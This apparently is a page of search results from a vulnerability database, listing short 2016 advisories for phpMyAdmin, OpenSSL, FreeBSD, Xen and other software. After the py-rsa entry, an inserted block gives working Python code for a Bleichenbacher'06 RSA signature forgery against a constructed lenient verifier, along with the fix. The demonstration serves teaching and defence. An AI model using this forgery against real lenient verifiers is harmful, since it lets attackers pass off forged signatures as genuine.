6528 matches found
phpmyadmin -- Full path disclosure vulnerability in SQL parser
The phpMyAdmin development team reports: By calling a particular script that is part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. We consider this vulnerability ...
hive -- authorization logic vulnerability
Sushanth Sowmyan reports: Some partition-level operations exist that do not explicitly also authorize privileges of the parent table. This can lead to issues when the parent table would have denied the operation, but no denial occurs because the partition-level privilege is not checked by the...
phpmyadmin -- Multiple full path disclosure vulnerabilities
The phpMyAdmin development team reports: By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. We consider these vulnerabilities to ...
phpmyadmin -- Multiple full path disclosure vulnerabilities
The phpMyAdmin development team reports: By calling some scripts that are part of phpMyAdmin in an unexpected way, it is possible to trigger phpMyAdmin to display a PHP error message which contains the full path of the directory where phpMyAdmin is installed. We consider these vulnerabilities to ...
ffmpeg -- remote denial of service in JPEG2000 decoder
FFmpeg security reports: FFmpeg 2.8.6 fixes the following vulnerabilities: CVE-2016-2213...
quagga -- stack based buffer overflow vulnerability
Donald Sharp reports: A malicious BGP peer may execute arbitrary code in particularly configured remote bgpd hosts...
prosody -- user impersonation vulnerability
The Prosody team reports: Adopt key generation algorithm from XEP-0185, to prevent impersonation attacks (CVE-2016-0756)...
FreeBSD -- Linux compatibility layer issetugid(2) system call
Problem Description: A programming error in the Linux compatibility layer could cause the issetugid(2) system call to return incorrect information. Impact: If an application relies on output of the issetugid(2) system call and that information is incorrect, this could lead to a privilege escalation...
curl -- Credentials not checked
The cURL project reports: libcurl will reuse NTLM-authenticated proxy connections without properly making sure that the connection was authenticated with the same credentials as set for this transfer...
mozilla -- multiple vulnerabilities
Mozilla Foundation reports: MFSA 2016-01 Miscellaneous memory safety hazards rv:44.0 / rv:38.6 MFSA 2016-02 Out of Memory crash when parsing GIF format images MFSA 2016-03 Buffer overflow in WebGL after out of memory allocation MFSA 2016-04 Firefox allows for control characters to be set in cooki...
nginx -- multiple vulnerabilities
Maxim Dounin reports: Several problems in nginx resolver were identified, which might allow an attacker to cause worker process crash, or might have potential other impact if the "resolver" directive is used in a configuration file...
NSS -- multiple vulnerabilities
Mozilla Foundation reports: Security researcher Hanno Böck reported that calculations with mp_div and mp_exptmod in Network Security Services (NSS) can produce wrong results in some circumstances. These functions are used within NSS for a variety of cryptographic division functions, leading to...
rails -- multiple vulnerabilities
Ruby on Rails blog: Rails 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, and 3.2.22.1 have been released! These contain important security fixes, and it is recommended that users upgrade as soon as possible...
salt -- code execution
SaltStack reports: Improper handling of clear messages on the minion, which could result in executing commands not sent by the master...
dhcpcd -- remote code execution/denial of service
MITRE reports: The print_option function in dhcp-common.c in dhcpcd through 6.9.1, as used in dhcp.c in dhcpcd 5.x in Android before 5.1 and other products, misinterprets the return value of the snprintf function, which allows remote DHCP servers to execute arbitrary code or cause a denial of...
privoxy -- multiple vulnerabilities
Privoxy Developers reports: Prevent invalid reads in case of corrupt chunk-encoded content. CVE-2016-1982. Bug discovered with afl-fuzz and AddressSanitizer. Remove empty Host headers in client requests. Previously they would result in invalid reads. CVE-2016-1983. Bug discovered with afl-fuzz an...
openssl -- multiple vulnerabilities
OpenSSL project reports: Historically OpenSSL only ever generated DH parameters based on "safe" primes. More recently in version 1.0.2 support was provided for generating X9.42 style parameter files such as those required for RFC 5114 support. The primes used in such files may not be "safe". Wher...
Python -- Integer overflow in zipimport module
Python reports: Possible integer overflow and heap corruption in zipimporter.get_data...
xen-kernel -- VMX: intercept issue with INVLPG on non-canonical address
The Xen Project reports: While INVLPG does not cause a General Protection Fault when used on a non-canonical address, INVVPID in its "individual address" variant, which is used to back the intercepted INVLPG in certain cases, fails in such cases. Failure of INVVPID results in a hypervisor bug...
ntp -- multiple vulnerabilities
Network Time Foundation reports: NTF's NTP Project has been notified of the following low- and medium-severity vulnerabilities that are fixed in ntp-4.2.8p6, released on Tuesday, 19 January 2016: Bug 2948 / CVE-2015-8158: Potential Infinite Loop in ntpq. Reported by Cisco ASIG. Bug 2945 /...
chromium -- multiple vulnerabilities
Google Chrome Releases reports: This update includes 37 security fixes, including: 497632 High CVE-2016-1612: Bad cast in V8. 572871 High CVE-2016-1613: Use-after-free in PDFium. 544691 Medium CVE-2016-1614: Information leak in Blink. 468179 Medium CVE-2016-1615: Origin confusion in Omnibox. 5414...
xen-kernel -- PV superpage functionality missing sanity checks
The Xen Project reports: The PV superpage functionality lacks certain validity checks on data being passed to the hypervisor by guests. This is the case for the page identifier (MFN) passed to the MMUEXT_MARK_SUPER and MMUEXT_UNMARK_SUPER sub-ops of the HYPERVISOR_mmuext_op hypercall as well as for various...
asterisk -- Long Contact URIs in REGISTER requests can crash Asterisk
The Asterisk project reports: Asterisk may crash when processing an incoming REGISTER request if that REGISTER contains a Contact header with a lengthy URI. This crash will only happen for requests that pass authentication. Unauthenticated REGISTER requests will not result in a crash occurring...
xymon-server -- multiple vulnerabilities
J.C. Cleaver reports: CVE-2016-2054: Buffer overflow in xymond handling of "config" command CVE-2016-2055: Access to possibly confidential files in the Xymon configuration directory CVE-2016-2056: Shell command injection in the "useradm" and "chpasswd" web applications CVE-2016-2057: Incorrect...
bind -- denial of service vulnerability
ISC reports: Specific APL data could trigger an INSIST in apl_42.c...
bind -- denial of service vulnerability
ISC reports: Problems converting OPT resource records and ECS options to text format can cause BIND to terminate...
moodle -- multiple vulnerabilities
Marina Glancy reports: MSA-16-0001: Two enrolment-related web services don't check course visibility MSA-16-0002: XSS Vulnerability in course management search...
FreeBSD -- Linux compatibility layer incorrect futex handling
Problem Description: A programming error in the handling of Linux futex robust lists may result in incorrect memory locations being accessed. Impact: It is possible for a local attacker to read portions of kernel memory, which may result in a privilege escalation...
cgit -- multiple vulnerabilities
Jason A. Donenfeld reports: Reflected Cross Site Scripting and Header Injection in Mimetype Query String. Stored Cross Site Scripting and Header Injection in Filename Parameter. Integer Overflow resulting in Buffer Overflow...
openssh -- information disclosure
OpenSSH reports: OpenSSH clients between versions 5.4 and 7.1 are vulnerable to information disclosure that may allow a malicious server to retrieve information including under some circumstances, user's private keys...
FreeBSD -- Insecure default snmpd.config permissions
Problem Description: The SNMP protocol supports an authentication model called USM, which relies on a shared secret. The default permission of the snmpd configuration file, /etc/snmpd.config, is weak and does not provide adequate protection against local unprivileged users. Impact: A local user m...
FreeBSD -- SCTP ICMPv6 error message vulnerability
Problem Description: A lack of proper input checks in the ICMPv6 processing in the SCTP stack can lead to either a failed kernel assertion or to a NULL pointer dereference. In either case, a kernel panic will follow. Impact: A remote, unauthenticated attacker can reliably trigger a kernel panic i...
FreeBSD -- Linux compatibility layer setgroups(2) system call
Problem Description: A programming error in the Linux compatibility layer setgroups(2) system call can lead to unexpected results, such as overwriting random kernel memory contents. Impact: It is possible for a local attacker to overwrite portions of kernel memory, which may result in a privileg...
FreeBSD -- TCP MD5 signature denial of service
Problem Description: A programming error in processing a TCP connection with both TCP_MD5SIG and TCP_NOOPT socket options may lead to a kernel crash. Impact: A local attacker can crash the kernel, resulting in a denial-of-service. A remote attack is theoretically possible, if the server has a listening...
go -- information disclosure vulnerability
Jason Buberel reports: A security-related issue has been reported in Go's math/big package. The issue was introduced in Go 1.5. We recommend that all users upgrade to Go 1.5.3, which fixes the issue. Go programs must be recompiled with Go 1.5.3 in order to receive the fix. The Go team would like ...
ffmpeg -- remote attacker can access local files
Arch Linux reports: ffmpeg has a vulnerability in the current version that allows the attacker to create a specially crafted video file, downloading which will send files from a user PC to a remote attacker server. The attack does not even require the user to open that file — for example, KDE...
h2o -- response header injection vulnerability
Kazuho OKU reports: When redirect directive is used, this flaw allows a remote attacker to inject response headers into an HTTP redirect response...
p5-PathTools -- File::Spec::canonpath loses taint
Ricardo Signes reports: Beginning in PathTools 3.47 and/or perl 5.20.0, the File::Spec::canonpath routine returned untainted strings even if passed tainted input. This defect undermines the guarantee of taint propagation, which is sometimes used to ensure that unvalidated user input does not reach...
atheme-services -- multiple vulnerabilities
Mitre reports: modules/chanserv/flags.c in Atheme before 7.2.7 allows remote attackers to modify the Anope FLAGS behavior by registering and dropping the (1) LIST, (2) CLEAR, or (3) MODIFY keyword nicks. Buffer overflow in the xmlrpc_char_encode function in modules/transport/xmlrpc/xmlrpclib.c in Atheme...
activemq -- Unsafe deserialization
Alvaro Muñoz, Matthias Kaiser and Christian Schneider report: JMS Object messages depend on Java Serialization for marshaling/unmarshaling of the message payload. There are a couple of places inside the broker where deserialization can occur, like web console or stomp object message...
prosody -- multiple vulnerabilities
The Prosody Team reports: Fix path traversal vulnerability in mod_http_files (CVE-2016-1231). Fix use of weak PRNG in generation of dialback secrets (CVE-2016-1232)...
php -- multiple vulnerabilities
PHP reports: Core: Fixed bug #70755, fpm_log.c memory leak and buffer overflow. GD: Fixed bug #70976, Memory Read via gdImageRotateInterpolated Array Index Out of Bounds. SOAP: Fixed bug #70900, SoapClient systematic out of memory error. Wddx: Fixed bug #70661, Use After Free Vulnerability in WDDX Packet...
wordpress -- XSS vulnerability
Aaron Jorbin reports: WordPress 4.4.1 is now available. This is a security release for all previous versions and we strongly encourage you to update your sites immediately. WordPress versions 4.4 and earlier are affected by a cross-site scripting vulnerability that could allow a site to be...
shotwell -- not verifying certificates
Michael Catanzaro reports: Shotwell has a serious security issue "Shotwell does not verify TLS certificates". Upstream is no longer active and I do not expect any further upstream releases unless someone from the community steps up to maintain it. What is the impact of the issue? If you ever used...
isc-dhcpd -- Denial of Service
ISC reports: A badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally...
py-rsa -- Bleichenbacher'06 signature forgery vulnerability
Filippo Valsorda reports: python-rsa is vulnerable to a straightforward variant of the Bleichenbacher'06 attack against RSA signature verification with low public exponent...
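The attack class this entry names, worked through as an added example (this is not python-rsa's code, and the garbage-tolerant verifier below is a constructed illustration of the flaw class, not python-rsa's own verify()): with e=3 and a 2048-bit modulus, an attacker builds a signature value s whose cube, taken as an integer, is 00 01 <arbitrary non-zero bytes> 00 <DigestInfo> <hash> and smaller than n, so no modular reduction ever happens and the private key is never needed. The low bits of s come from a cube root modulo 2^L (fixing the hash at the right end), the high bits from a real cube root (fixing the 00 01 prefix); a verifier that only looks for the first 00 separator and never insists that everything between 01 and that separator is 0xFF padding accepts the result. The key, messages and both verifiers are constructed here; key generation uses a seeded PRNG so the run is repeatable, and the code needs Python 3.8+ for `pow(e, -1, m)`.

```python
# Added example (not python-rsa's code): Bleichenbacher'06 forgery against a
# garbage-tolerant PKCS#1 v1.5 verifier with e=3.  Key, message and verifiers
# are constructed here for the demo.  Needs Python 3.8+ (3-arg pow with -1).
import hashlib
import hmac
import random

E = 3
SHA256_PREFIX = bytes.fromhex("3031300d060960864801650304020105000420")  # DigestInfo, RFC 8017 9.2
SMALL_PRIMES = [p for p in range(3, 2000) if all(p % q for q in range(2, int(p ** 0.5) + 1))]

def byte_len(n):
    return (n.bit_length() + 7) // 8

def emsa_pkcs1_v15(msg, k):
    """Canonical block: 00 01 FF..FF 00 || DigestInfo || SHA-256(msg), k bytes long."""
    t = SHA256_PREFIX + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t

def is_probable_prime(n, rng, rounds=20):
    """Trial division plus Miller-Rabin; only meant for the large odd candidates below."""
    if n % 2 == 0 or any(n % p == 0 for p in SMALL_PRIMES):
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def gen_key(bits=2048, seed=2016):
    """Constructed RSA key with e=3; p, q = 2 (mod 3) keeps 3 invertible mod phi(n)."""
    rng = random.Random(seed)

    def prime():
        while True:
            p = rng.getrandbits(bits // 2) | 1 << (bits // 2 - 1) | 1
            if p % 3 == 2 and is_probable_prime(p, rng):
                return p

    p, q = prime(), prime()
    return p * q, pow(E, -1, (p - 1) * (q - 1))

def sign(n, d, msg):
    return pow(int.from_bytes(emsa_pkcs1_v15(msg, byte_len(n)), "big"), d, n)

def verify_lenient(n, msg, sig):
    """Flawed: finds the first 00 after 00 01 and never checks the bytes in between."""
    em = pow(sig, E, n).to_bytes(byte_len(n), "big")
    if em[:2] != b"\x00\x01":
        return False
    sep = em.find(b"\x00", 2)
    return sep > 0 and em[sep + 1:] == SHA256_PREFIX + hashlib.sha256(msg).digest()

def verify_strict(n, msg, sig):
    """Correct: the decrypted block must equal the canonical encoding byte for byte."""
    k = byte_len(n)
    em = pow(sig, E, n).to_bytes(k, "big")
    return hmac.compare_digest(em, emsa_pkcs1_v15(msg, k))

def icbrt(n):
    """floor(cbrt(n)) by integer Newton iteration started above the root."""
    x = 1 << -(-n.bit_length() // 3)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y

def cube_root_mod_2k(t, bits):
    """The odd r with r**3 == t (mod 2**bits), by Hensel lifting one bit at a time."""
    r = 1
    for i in range(1, bits):
        if (r ** 3 - t) >> i & 1:
            r |= 1 << i
    return r

def forge(n, base_msg):
    """Return (msg, sig) with sig**3 == 00 01 <non-zero junk> 00 DigestInfo hash, and sig**3 < n."""
    k = byte_len(n)
    for i in range(256):  # attacker picks a message variant whose hash ends in an odd byte
        msg = base_msg + b" #%d" % i
        tail = b"\x00" + SHA256_PREFIX + hashlib.sha256(msg).digest()
        if tail[-1] & 1:
            break
    L = 8 * len(tail)
    low = cube_root_mod_2k(int.from_bytes(tail, "big"), L)   # fixes the last L bits of sig**3
    high = icbrt(3 << (8 * k - 17)) >> L                     # sig**3 lands near 1.5 * 2**(8k-16)
    for j in range(100000):  # retry until the junk region contains no 0x00 byte
        sig = (high + j) << L | low
        em = (sig ** 3).to_bytes(k, "big")  # sig**3 < n, so pow(sig, 3, n) == sig**3
        if em[:2] == b"\x00\x01" and b"\x00" not in em[2:k - len(tail)]:
            return msg, sig
    raise RuntimeError("no forgery found")
```

Run it as `n, d = gen_key(); m, s = forge(n, b"pay 10 to mallory")`: `verify_lenient(n, m, s)` returns True while `verify_strict(n, m, s)` returns False, and a genuine `sign(n, d, msg)` passes both. The fix is the strict comparison: regenerate the full expected block and compare it whole, rather than parsing the decrypted value and tolerating whatever surrounds the hash.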
mbedTLS/PolarSSL -- SLOTH attack on TLS 1.2 server authentication
ARM Limited reports: MD5 handshake signatures in TLS 1.2 are vulnerable to the SLOTH attack on TLS 1.2 server authentication. They have been disabled by default. Other attacks from the SLOTH paper do not apply to any version of mbed TLS or PolarSSL...
dhcpcd -- multiple vulnerabilities
Nico Golde reports: heap overflow via malformed dhcp responses later in print_option via dhcp_envoption1 due to incorrect option length values. Exploitation is non-trivial, but I'd love to be proven wrong. invalid read/crash via malformed dhcp responses. not exploitable beyond DoS as far as I can...
wireshark -- multiple vulnerabilities
Wireshark development team reports: The following vulnerabilities have been fixed: wnpa-sec-2015-31 NBAP dissector crashes. Bug 11602, Bug 11835, Bug 11841 wnpa-sec-2015-37 NLM dissector crash. wnpa-sec-2015-39 BER dissector crash. wnpa-sec-2015-40 Zlib decompression crash. Bug 11548...
qemu -- denial of service vulnerability in Rocker switch emulation
Prasad J Pandit, Red Hat Product Security Team, reports: Qemu emulator built with the Rocker switch emulation support is vulnerable to an off-by-one error. It happens while processing transmit (tx) descriptors in the 'tx_consume' routine, if a descriptor was to have more than the allowed ROCKER_TX_FRAGS_MAX=16...